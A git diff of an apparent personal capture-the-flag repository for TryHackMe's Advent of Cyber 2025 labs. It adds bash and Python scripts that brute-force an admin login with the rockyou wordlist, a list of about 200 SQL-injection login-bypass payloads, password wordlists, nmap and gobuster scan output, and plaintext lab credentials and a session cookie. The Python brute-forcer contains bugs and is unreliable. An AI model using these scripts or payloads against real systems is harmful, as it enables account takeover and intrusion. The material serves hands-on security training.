diff --git a/AoC/2025/14/deploy_user_pass.txt b/AoC/2025/14/deploy_user_pass.txt new file mode 100644 index 0000000..1ad4d36 --- /dev/null +++ b/AoC/2025/14/deploy_user_pass.txt @@ -0,0 +1 @@ +DeployMaster2025 diff --git a/AoC/2025/21/NorthPole.zip b/AoC/2025/21/NorthPole.zip new file mode 100644 index 0000000..fb0a738 Binary files /dev/null and b/AoC/2025/21/NorthPole.zip differ diff --git a/AoC/2025/21/NorthPolePerformanceReview.hta b/AoC/2025/21/NorthPolePerformanceReview.hta new file mode 100644 index 0000000..4c428dc --- /dev/null +++ b/AoC/2025/21/NorthPolePerformanceReview.hta @@ -0,0 +1,3790 @@ + +
+Please complete your end-of-season review. All responses are confidential.
+| Elf Name: | ++ |
| Workshop: | ++ + | +
| Morale (1-5): | ++ + | +
| Overtime Hours: | ++ |
+ +
+ + diff --git a/AoC/2025/21/zip_pass.txt b/AoC/2025/21/zip_pass.txt new file mode 100644 index 0000000..126358d --- /dev/null +++ b/AoC/2025/21/zip_pass.txt @@ -0,0 +1 @@ +CanYouREM3? diff --git a/AoC/2025/24/.bruteforce.sh.swp b/AoC/2025/24/.bruteforce.sh.swp new file mode 100644 index 0000000..49e262f Binary files /dev/null and b/AoC/2025/24/.bruteforce.sh.swp differ diff --git a/AoC/2025/24/bruteforce.sh b/AoC/2025/24/bruteforce.sh new file mode 100755 index 0000000..17e57e2 --- /dev/null +++ b/AoC/2025/24/bruteforce.sh @@ -0,0 +1,10 @@ +for word in $(cat /usr/share/wordlists/rockyou.txt); do + response=$(curl -s -A "secretcomputer" -X POST -d "username=admin&password=$word" http://10.82.144.99/terminal.php?action=login) + #echo $response + status=$(echo $response | jq -e ".status" | tr -d '"') + printf "Checking %s with status %s \r" "$word" "$status" + if [ "$status" != "fail" ]; then + echo "Credentials are admin:$word" + break + fi +done diff --git a/AoC/2025/24/cookie.txt b/AoC/2025/24/cookie.txt new file mode 100644 index 0000000..c2c6157 --- /dev/null +++ b/AoC/2025/24/cookie.txt @@ -0,0 +1,5 @@ +# Netscape HTTP Cookie File +# https://curl.se/docs/http-cookies.html +# This file was generated by libcurl! Edit at your own risk. + +10.82.144.99 FALSE / FALSE 0 PHPSESSID r6grvo93glp6pc1ocqkvfrcelp diff --git a/AoC/2025/24/username.py b/AoC/2025/24/username.py new file mode 100644 index 0000000..6dcb6cc --- /dev/null +++ b/AoC/2025/24/username.py @@ -0,0 +1,49 @@ +import requests +import json +import os + +#{ +# "service": "Wormhole Control Panel", +# "endpoints": { +# "\/terminal.php?action=info": "Public info", +# "\/terminal.php?action=login": "POST: username,password", +# "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token", +# "\/terminal.php?action=status": "GET: wormhole status", +# "\/terminal.php?action=close": "POST: close wormhole" +# }, +# "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole." +#} + +def main(): + wordlist = "/usr/share/wordlists/rockyou.txt" + url = "10.81.152.59" + proto = "http" + target = "terminal.php?action=login" + user_agent = "secretcomputer" + headers = {"User-Agent": user_agent} + username = ["user", "admin"] + + lines = int(os.popen(f"wc -l {wordlist}").read().split()[0]) + print(lines) + count = 0 + + try: + with open(wordlist, 'r') as file: + for user in username: + for word in file: + count += 1 + print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r") + data = {"username": user, "password": word} + response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json() + if isinstance(response, dict): + if response["status"] != "fail": + print(f"Credentials found: {user}:{password}") + except FileNotFoundError: + print("File not found") + return + except Exception as e: + print(f"An Error occured: {e}") + return + +if __name__ == "__main__": + main() diff --git a/AoC/2025/24/username.txt b/AoC/2025/24/username.txt new file mode 100644 index 0000000..9699c26 --- /dev/null +++ b/AoC/2025/24/username.txt @@ -0,0 +1,2 @@ +user +admin diff --git a/AoC/2025/sq1/base_wordlist.txt b/AoC/2025/sq1/base_wordlist.txt new file mode 100644 index 0000000..2cf91d8 --- /dev/null +++ b/AoC/2025/sq1/base_wordlist.txt @@ -0,0 +1,33 @@ +Johnnyboy1982! +Johnnyboy1982@ +Johnnyboy1982# +Johnnyboy1982$ +Johnnyboy1982% +Johnnyboy1982^ +Johnnyboy1982& +Johnnyboy1982* +Johnnyboy1982( +Johnnyboy1982) +Johnnyboy1982- +Johnnyboy1982_ +Johnnyboy1982+ +Johnnyboy1982= +Johnnyboy1982~ +Johnnyboy1982` +Johnnyboy1982[ +Johnnyboy1982] +Johnnyboy1982{ +Johnnyboy1982} +Johnnyboy1982| +Johnnyboy1982\ +Johnnyboy1982: +Johnnyboy1982; +Johnnyboy1982" +Johnnyboy1982' +Johnnyboy1982< +Johnnyboy1982> +Johnnyboy1982, +Johnnyboy1982. +Johnnyboy1982? +Johnnyboy1982/ +Johnnyboy1982 diff --git a/AoC/2025/01/sideQuest/combined_wordlist.txt b/AoC/2025/sq1/combined_wordlist.txt similarity index 100% rename from AoC/2025/01/sideQuest/combined_wordlist.txt rename to AoC/2025/sq1/combined_wordlist.txt diff --git a/AoC/2025/01/sideQuest/facebook_pass.txt b/AoC/2025/sq1/facebook_pass.txt similarity index 100% rename from AoC/2025/01/sideQuest/facebook_pass.txt rename to AoC/2025/sq1/facebook_pass.txt diff --git a/AoC/2025/01/sideQuest/gobuster_scan_small.txt b/AoC/2025/sq1/gobuster_scan_small.txt similarity index 100% rename from AoC/2025/01/sideQuest/gobuster_scan_small.txt rename to AoC/2025/sq1/gobuster_scan_small.txt diff --git a/AoC/2025/01/sideQuest/guard.txt b/AoC/2025/sq1/guard.txt similarity index 100% rename from AoC/2025/01/sideQuest/guard.txt rename to AoC/2025/sq1/guard.txt diff --git a/AoC/2025/01/sideQuest/nmap_scan.txt b/AoC/2025/sq1/nmap_scan.txt similarity index 100% rename from AoC/2025/01/sideQuest/nmap_scan.txt rename to AoC/2025/sq1/nmap_scan.txt diff --git a/AoC/2025/01/sideQuest/nmap_scan1.nmap b/AoC/2025/sq1/nmap_scan1.nmap similarity index 100% rename from AoC/2025/01/sideQuest/nmap_scan1.nmap rename to AoC/2025/sq1/nmap_scan1.nmap diff --git a/AoC/2025/01/sideQuest/passwords.txt b/AoC/2025/sq1/passwords.txt similarity index 100% rename from AoC/2025/01/sideQuest/passwords.txt rename to AoC/2025/sq1/passwords.txt diff --git a/AoC/2025/01/sideQuest/passwords_cewl.txt b/AoC/2025/sq1/passwords_cewl.txt similarity index 100% rename from AoC/2025/01/sideQuest/passwords_cewl.txt rename to AoC/2025/sq1/passwords_cewl.txt diff --git a/AoC/2025/01/sideQuest/passwords_con.txt b/AoC/2025/sq1/passwords_con.txt similarity index 100% rename from AoC/2025/01/sideQuest/passwords_con.txt rename to AoC/2025/sq1/passwords_con.txt diff --git a/AoC/2025/01/sideQuest/passwords_con.txt.cupp.txt b/AoC/2025/sq1/passwords_con.txt.cupp.txt similarity index 100% rename from AoC/2025/01/sideQuest/passwords_con.txt.cupp.txt rename to AoC/2025/sq1/passwords_con.txt.cupp.txt diff --git a/AoC/2025/01/sideQuest/posts.html b/AoC/2025/sq1/posts.html similarity index 100% rename from AoC/2025/01/sideQuest/posts.html rename to AoC/2025/sq1/posts.html diff --git a/AoC/2025/sq2/4.2.0.zip b/AoC/2025/sq2/4.2.0.zip new file mode 100644 index 0000000..bd8ee88 Binary files /dev/null and b/AoC/2025/sq2/4.2.0.zip differ diff --git a/AoC/2025/sq2/gobuster.txt b/AoC/2025/sq2/gobuster.txt new file mode 100644 index 0000000..1561a72 Binary files /dev/null and b/AoC/2025/sq2/gobuster.txt differ diff --git a/AoC/2025/sq2/latest/beacon.bin b/AoC/2025/sq2/latest/beacon.bin new file mode 100755 index 0000000..c2a16cf Binary files /dev/null and b/AoC/2025/sq2/latest/beacon.bin differ diff --git a/AoC/2025/sq2/nmap-scan.txt b/AoC/2025/sq2/nmap-scan.txt new file mode 100644 index 0000000..f96d591 --- /dev/null +++ b/AoC/2025/sq2/nmap-scan.txt @@ -0,0 +1,70 @@ +# Nmap 7.95 scan initiated Tue Dec 9 19:51:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap-scan.txt 10.82.170.160 +Nmap scan report for 10.82.170.160 +Host is up (0.041s latency). +Not shown: 65531 closed tcp ports (reset) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 256 f6:ad:e2:2c:8b:d4:f6:f8:1d:47:c8:56:81:ca:f0:86 (ECDSA) +|_ 256 2d:c7:95:46:a2:df:45:9d:bc:8a:5c:a7:2f:a6:4f:23 (ED25519) +80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) +|_http-server-header: Apache/2.4.58 (Ubuntu) +|_http-title: Under Construction +9004/tcp open unknown +| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, RPCCheck, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: +| Payload Storage Malhare's +| Version 4.2.0 +| >>Invalid option +| GenericLines, NULL: +| Payload Storage Malhare's +|_ Version 4.2.0 +21337/tcp open http Werkzeug httpd 3.0.1 (Python 3.12.3) +|_http-server-header: Werkzeug/3.0.1 Python/3.12.3 +|_http-title: Unlock Hopper's Memories +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port9004-TCP:V=7.95%I=7%D=12/9%Time=69386FDC%P=aarch64-unknown-linux-gn +SF:u%r(NULL,46,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\] +SF:\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(JavaRMI,55,"Paylo +SF:ad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U +SF::\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(GenericLines,46, +SF:"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\ +SF:]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>")%r(GetRequest,55,"Payload\x20Sto +SF:rage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\ +SF:x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(HTTPOptions,55,"Payload\x +SF:20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\ +SF:[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RTSPRequest,55,"Payl +SF:oad\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20 +SF:U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(RPCCheck,55,"Pa +SF:yload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x +SF:20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r(DNSVersionBin +SF:dReqTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\ +SF:x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20option\n")%r +SF:(DNSStatusRequestTCP,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\ +SF:.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x2 +SF:0option\n")%r(Help,55,"Payload\x20Storage\x20Malhare's\nVersion\x204\.2 +SF:\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Invalid\x20o +SF:ption\n")%r(SSLSessionReq,55,"Payload\x20Storage\x20Malhare's\nVersion\ +SF:x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\x20E:\n>>Inval +SF:id\x20option\n")%r(TerminalServerCookie,55,"Payload\x20Storage\x20Malha +SF:re's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\n\[4\]\ +SF:x20E:\n>>Invalid\x20option\n")%r(TLSSessionReq,55,"Payload\x20Storage\x +SF:20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D:\ +SF:n\[4\]\x20E:\n>>Invalid\x20option\n")%r(Kerberos,55,"Payload\x20Storage +SF:\x20Malhare's\nVersion\x204\.2\.0\n\[1\]\x20C:\n\[2\]\x20U:\n\[3\]\x20D +SF::\n\[4\]\x20E:\n>>Invalid\x20option\n"); +Device type: general purpose +Running: Linux 4.X +OS CPE: cpe:/o:linux:linux_kernel:4.15 +OS details: Linux 4.15 +Network Distance: 3 hops +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 43.94 ms 192.168.128.1 +2 ... +3 44.79 ms 10.82.170.160 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Tue Dec 9 19:52:26 2025 -- 1 IP address (1 host up) scanned in 52.64 seconds diff --git a/CTF/Injections/gobuster.txt b/CTF/Injections/gobuster.txt new file mode 100644 index 0000000..97a96f7 --- /dev/null +++ b/CTF/Injections/gobuster.txt @@ -0,0 +1,13 @@ +/index.php [32m (Status: 200)[0m [Size: 6588] +/login.php [32m (Status: 200)[0m [Size: 5401] +/mail.log [32m (Status: 200)[0m [Size: 1098] +/flags [36m (Status: 301)[0m [Size: 314][34m [--> http://10.82.175.205/flags/][0m +/css [36m (Status: 301)[0m [Size: 312][34m [--> http://10.82.175.205/css/][0m +/js [36m (Status: 301)[0m [Size: 311][34m [--> http://10.82.175.205/js/][0m +/javascript [36m (Status: 301)[0m [Size: 319][34m [--> http://10.82.175.205/javascript/][0m +/logout.php [36m (Status: 302)[0m [Size: 0][34m [--> index.php][0m +/vendor [36m (Status: 301)[0m [Size: 315][34m [--> http://10.82.175.205/vendor/][0m +/dashboard.php [36m (Status: 302)[0m [Size: 0][34m [--> dashboard.php][0m +/functions.php [32m (Status: 200)[0m [Size: 0] +/phpmyadmin [36m (Status: 301)[0m [Size: 319][34m [--> http://10.82.175.205/phpmyadmin/][0m +/conn.php [32m (Status: 200)[0m [Size: 0] diff --git a/CTF/Injections/nmap_scan1.nmap b/CTF/Injections/hist/nmap_scan1.nmap similarity index 100% rename from CTF/Injections/nmap_scan1.nmap rename to CTF/Injections/hist/nmap_scan1.nmap diff --git a/CTF/Injections/nmap_scan2.nmap b/CTF/Injections/hist/nmap_scan2.nmap similarity index 100% rename from CTF/Injections/nmap_scan2.nmap rename to CTF/Injections/hist/nmap_scan2.nmap diff --git a/CTF/Injections/pass.txt b/CTF/Injections/hist/pass.txt similarity index 100% rename from CTF/Injections/pass.txt rename to CTF/Injections/hist/pass.txt diff --git a/CTF/Injections/nmap_scan.txt b/CTF/Injections/nmap_scan.txt new file mode 100644 index 0000000..3afebbc --- /dev/null +++ b/CTF/Injections/nmap_scan.txt @@ -0,0 +1,32 @@ +# Nmap 7.95 scan initiated Fri Dec 12 11:49:33 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan.txt 10.82.175.205 +Nmap scan report for 10.82.175.205 +Host is up (0.042s latency). +Not shown: 65533 closed tcp ports (reset) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 3072 27:7b:ea:74:bf:6d:16:89:c8:54:28:1e:c8:2b:f1:56 (RSA) +| 256 37:2b:c1:36:20:7e:17:bf:83:b3:3d:3e:06:3e:12:a4 (ECDSA) +|_ 256 fd:87:f9:03:11:6c:d9:3c:fc:d1:d3:88:b3:bf:c7:91 (ED25519) +80/tcp open http Apache httpd 2.4.41 +| http-cookie-flags: +| /: +| PHPSESSID: +|_ httponly flag not set +|_http-title: Injectics Leaderboard +|_http-server-header: Apache/2.4.41 (Ubuntu) +Device type: general purpose +Running: Linux 4.X +OS CPE: cpe:/o:linux:linux_kernel:4.15 +OS details: Linux 4.15 +Network Distance: 3 hops +Service Info: Host: ip-10-82-175-205.eu-west-1.compute.internal; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +TRACEROUTE (using port 80/tcp) +HOP RTT ADDRESS +1 39.12 ms 192.168.128.1 +2 ... +3 40.22 ms 10.82.175.205 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Fri Dec 12 11:50:22 2025 -- 1 IP address (1 host up) scanned in 49.22 seconds diff --git a/CTF/Injections/sqli_bypass.txt b/CTF/Injections/sqli_bypass.txt new file mode 100644 index 0000000..c3b9eb5 --- /dev/null +++ b/CTF/Injections/sqli_bypass.txt @@ -0,0 +1,198 @@ +'-' +' ' +'&' +'^' +'*' +' or ''-' +' or '' ' +' or ''&' +' or ''^' +' or ''*' +"-" +" " +"&" +"^" +"*" +" or ""-" +" or "" " +" or ""&" +" or ""^" +" or ""*" +or true-- +" or true-- +' or true-- +") or true-- +') or true-- +' or 'x'='x +') or ('x')=('x +')) or (('x'))=(('x +" or "x"="x +") or ("x")=("x +")) or (("x"))=(("x +or 1=1 +or 1=1-- +or 1=1# +or 1=1/* +admin' -- +admin' # +admin'/* +admin' or '1'='1 +admin' or '1'='1'-- +admin' or '1'='1'# +admin' or '1'='1'/* +admin'or 1=1 or ''=' +admin' or 1=1 +admin' or 1=1-- +admin' or 1=1# +admin' or 1=1/* +admin') or ('1'='1 +admin') or ('1'='1'-- +admin') or ('1'='1'# +admin') or ('1'='1'/* +admin') or '1'='1 +admin') or '1'='1'-- +admin') or '1'='1'# +admin') or '1'='1'/* +1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055 +admin" -- +admin" # +admin"/* +admin" or "1"="1 +admin" or "1"="1"-- +admin" or "1"="1"# +admin" or "1"="1"/* +admin"or 1=1 or ""=" +admin" or 1=1 +admin" or 1=1-- +admin" or 1=1# +admin" or 1=1/* +admin") or ("1"="1 +admin") or ("1"="1"-- +admin") or ("1"="1"# +admin") or ("1"="1"/* +admin") or "1"="1 +admin") or "1"="1"-- +admin") or "1"="1"# +admin") or "1"="1"/* +1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055 +== += +' +' -- +' # +' – +'-- +'/* +'# +" -- +" # +"/* +' and 1='1 +' and a='a + or 1=1 + or true +' or ''=' +" or ""=" +1′) and '1′='1– +' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055 +" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055 + and 1=1 + and 1=1– +' and 'one'='one +' and 'one'='one– +' group by password having 1=1-- +' group by userid having 1=1-- +' group by username having 1=1-- + like '%' + or 0=0 -- + or 0=0 # + or 0=0 – +' or 0=0 # +' or 0=0 -- +' or 0=0 # +' or 0=0 – +" or 0=0 -- +" or 0=0 # +" or 0=0 – +%' or '0'='0 + or 1=1 + or 1=1-- + or 1=1/* + or 1=1# + or 1=1– +' or 1=1-- +' or '1'='1 +' or '1'='1'-- +' or '1'='1'/* +' or '1'='1'# +' or '1′='1 +' or 1=1 +' or 1=1 -- +' or 1=1 – +' or 1=1-- +' or 1=1;# +' or 1=1/* +' or 1=1# +' or 1=1– +') or '1'='1 +') or '1'='1-- +') or '1'='1'-- +') or '1'='1'/* +') or '1'='1'# +') or ('1'='1 +') or ('1'='1-- +') or ('1'='1'-- +') or ('1'='1'/* +') or ('1'='1'# +'or'1=1 +'or'1=1′ +" or "1"="1 +" or "1"="1"-- +" or "1"="1"/* +" or "1"="1"# +" or 1=1 +" or 1=1 -- +" or 1=1 – +" or 1=1-- +" or 1=1/* +" or 1=1# +" or 1=1– +") or "1"="1 +") or "1"="1"-- +") or "1"="1"/* +") or "1"="1"# +") or ("1"="1 +") or ("1"="1"-- +") or ("1"="1"/* +") or ("1"="1"# +) or '1′='1– +) or ('1′='1– +' or 1=1 LIMIT 1;# +'or 1=1 or ''=' +"or 1=1 or ""=" +' or 'a'='a +' or a=a-- +' or a=a– +') or ('a'='a +" or "a"="a +") or ("a"="a +') or ('a'='a and hi") or ("a"="a +' or 'one'='one +' or 'one'='one– +' or uid like '% +' or uname like '% +' or userid like '% +' or user like '% +' or username like '% +' or 'x'='x +') or ('x'='x +" or "x"="x +' OR 'x'='x'#; +'=' 'or' and '=' 'or' +' UNION ALL SELECT 1, @@version;# +' UNION ALL SELECT system_user(),user();# +' UNION select table_schema,table_name FROM information_Schema.tables;# +admin' and substring(password/text(),1,1)='7 +' and substring(password/text(),1,1)='7 +' or 1=1 limit 1 -- -+ +'="or' diff --git a/TryHackMe.ovpn b/TryHackMe.ovpn new file mode 100644 index 0000000..794c7e7 --- /dev/null +++ b/TryHackMe.ovpn @@ -0,0 +1,131 @@ +client +dev tun +proto udp +remote ga-eu-west-1-vpn.vm.tryhackme.com 1194 +resolv-retry infinite +nobind +persist-key +persist-tun +auth-user-pass +